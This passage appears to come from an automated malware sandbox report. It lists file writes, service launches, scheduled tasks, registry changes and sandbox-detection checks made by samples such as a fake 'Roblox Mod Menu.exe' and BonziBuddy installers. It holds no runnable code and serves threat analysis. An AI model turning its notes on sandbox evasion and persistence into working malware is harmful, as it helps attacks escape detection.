C:\Windows\msagent\AgentDPv.dll Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B5F.tmp Roblox Mod Menu.exe File created C:\Windows\lhsp\tv\SET43B7.tmp tv_enua.exe File opened for modification C:\Windows\lhsp\tv\tvenuax.dll tv_enua.exe File opened for modification C:\Windows\msagent\chars\Bonzi.acs BonziBuddy432.exe File opened for modification C:\Windows\msagent\SET3B60.tmp Roblox Mod Menu.exe File created C:\Windows\msagent\intl\SET3B75.tmp Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B60.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\INF\tv_enua.inf tv_enua.exe File opened for modification C:\Windows\msagent\AgentSR.dll Roblox Mod Menu.exe File created C:\Windows\help\SET3B74.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\intl\Agt0409.dll Roblox Mod Menu.exe File opened for modification C:\Windows\lhsp\help\tv_enua.hlp tv_enua.exe File created C:\Windows\fonts\SET43BA.tmp tv_enua.exe File opened for modification C:\Windows\msagent\SET3B4D.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B73.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B86.tmp Roblox Mod Menu.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1416 sc.exe 3532 sc.exe 5912 sc.exe 3900 sc.exe 3880 sc.exe 1604 sc.exe 5176 sc.exe 228 sc.exe 3116 sc.exe 548 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5960 5384 WerFault.exe AE1.exe 5568 5808 WerFault.exe 1E7B.exe 4892 5652 WerFault.exe 2821.exe 6128 5992 WerFault.exe EE9B.exe 4108 1720 WerFault.exe 9D62.exe 3288 4436 WerFault.exe firefox.exe 3824 6036 WerFault.exe firefox.exe 1332 4688 WerFault.exe htswgba 4364 3088 WerFault.exe firefox.exe 2620 5132 WerFault.exe firefox.exe 1032 5240 WerFault.exe firefox.exe 1944 3316 WerFault.exe firefox.exe 9200 1012 WerFault.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
260D.exetcswgba5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe7C3.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 260D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tcswgba Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tcswgba Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7C3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7C3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7C3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 260D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 260D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tcswgba Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe -
Checks processor information in registry 2 TTPs 41 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exemsedge.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exesvchost.exedllhost.exebuild2.exebuild2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3660 schtasks.exe 5124 schtasks.exe 5696 schtasks.exe 5336 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3828 timeout.exe 2660 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Processes:
Explorer.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\IESettingSync Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 64 IoCs
Processes:
BonziBuddy432.exeregsvr32.exeregsvr32.exeBonziBDY_4.EXEAgentSvr.exefirefox.execrashreporter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867A2-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35053A21-8589-11D1-B16A-00C0F0283628}\ = "IProgressBarEvents" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel = "Apartment" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3F-8596-11D1-B16A-00C0F0283628}\InprocServer32 BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D31-2CDD-11D3-9DD0-D3CD4078982A}\ProxyStubClsid32 BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D47-2CDD-11D3-9DD0-D3CD4078982A}\Insertable BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinLabel\CurVer BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Threed.SSFrame\CLSID\ = "{065E6FD8-1BF9-11D2-BAE8-00104B9E0792}" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib\ = "{48E59290-9880-11CF-9754-00AA00C00908}" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BDB-7DE6-11D0-91FE-00C04FD701A5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.acs\ = "Agent.Character2.2" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F4900F5D-055F-11D4-8F9B-00104BA312D6}\1.4\FLAGS\ = "0" BonziBDY_4.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BonziBUDDY.clsDownloadManager\Clsid\ = "{F4900F96-055F-11D4-8F9B-00104BA312D6}" BonziBDY_4.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE11629C-36DF-11D3-9DD0-89D6DBBBA800}\ToolboxBitmap32\ = "C:\\PROGRA~2\\BONZIB~1\\ACTIVE~1.OCX, 217" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}\ = "DImageComboEvents" BonziBuddy432.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\MiscStatus regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00D18159-8466-11D0-AC63-00C04FD97575}\TypeLib\ = "{A7B93C73-7B81-11D0-AC5F-00C04FD97575}" AgentSvr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Agent.Control.2\ = "Microsoft Agent Control 2.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FE4-1BF9-11D2-BAE8-00104B9E0792}\TypeLib BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EF6BEC0-E669-11CD-836C-0000C0C14E92}\TypeLib\ = "{E8671A8B-E5DD-11CD-836C-0000C0C14E92}" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F581B2D6-E4C3-40BF-8A1E-F68CDFD8FEEC}\TypeLib BonziBDY_4.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628} BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl\CurVer\ = "MSComctlLib.ProgCtrl.2" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BD4-7DE6-11D0-91FE-00C04FD701A5} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F55ED2E0-6E13-11CE-918C-0000C0554C0A}\TypeLib\Version = "1.0" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A031FBF6-81A7-4440-9E20-51ABB2289E4B}\Implemented Categories BonziBDY_4.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\MiscStatus BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\ = "Microsoft Internet Transfer Control 6.0" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{62FCAC31-2581-11D2-BAF1-00104B9E0792}\TypeLib\Version = "3.0" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EF6BEC1-E669-11CD-836C-0000C0C14E92}\ProxyStubClsid32 BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D46-2CDD-11D3-9DD0-D3CD4078982A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\MiscStatus BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F055-858B-11D1-B16A-00C0F0283628}\TypeLib BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BE3-7DE6-11D0-91FE-00C04FD701A5}\ = "IAgentCtlCommand" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D4D-2CDD-11D3-9DD0-D3CD4078982A}\MiscStatus BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE11629C-36DF-11D3-9DD0-89D6DBBBA800}\MiscStatus BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B976287-3692-11D0-9B8A-0000C0F04C96}\TypeLib\Version = "2.0" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A45DB49-BD0D-11D2-8D14-00104B9E072A} BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A4E0988E-24BE-4570-B4D8-982F1386E0C6}\ = "clsClickTheButton" BonziBDY_4.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BE3-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35053A20-8589-11D1-B16A-00C0F0283628} BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE6-1BF9-11D2-BAE8-00104B9E0792}\TypeLib BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0 BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{916694A8-8AD6-11D2-B6FD-0060976C699F}\TypeLib\Version = "1.1" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\MiscStatus\1\ = "135569" BonziBuddy432.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B976287-3692-11D0-9B8A-0000C0F04C96}\ = "ISSDataObject" BonziBuddy432.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628} BonziBuddy432.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3E-8596-11D1-B16A-00C0F0283628}\InprocServer32 BonziBuddy432.exe Key created 